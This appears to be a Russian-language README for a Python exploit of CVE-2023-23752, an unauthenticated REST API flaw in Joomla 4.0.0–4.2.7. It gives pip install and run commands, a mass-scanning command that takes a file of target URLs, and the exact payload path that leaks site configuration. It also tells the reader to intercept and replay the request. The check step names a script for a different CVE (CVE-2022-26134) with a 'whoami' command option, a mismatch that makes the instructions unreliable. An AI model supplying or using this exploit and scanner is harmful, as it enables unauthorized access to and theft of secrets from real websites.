
Эксплойт на Python для CVE-2023-23752, нацеленный на Joomla 4.0.0-4.2.7, предоставляет несанкционированный доступ к REST API, позволяя раскрывать конфиденциальную информацию с помощью специально сформированных полезных нагрузок.
CVE-2023-23752 - Воспроизведение уязвимости неавторизованного доступа в Joomla
Установка библиотек Python
pip install -r requirements.txt
Проверка уязвимости
python3 CVE-2022-26134_check.py -u url -c whoami

Массовое сканирование
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Перейдите по уязвимому адресу, перехватите пакет, повторите отправку пакета.

В Joomla! CMS версии 4.0.0–4.2.7 из-за неправильного ограничения доступа к конечным точкам веб-служб возможен неавторизованный доступ к REST API, что приводит к утечке конфиденциальной информации.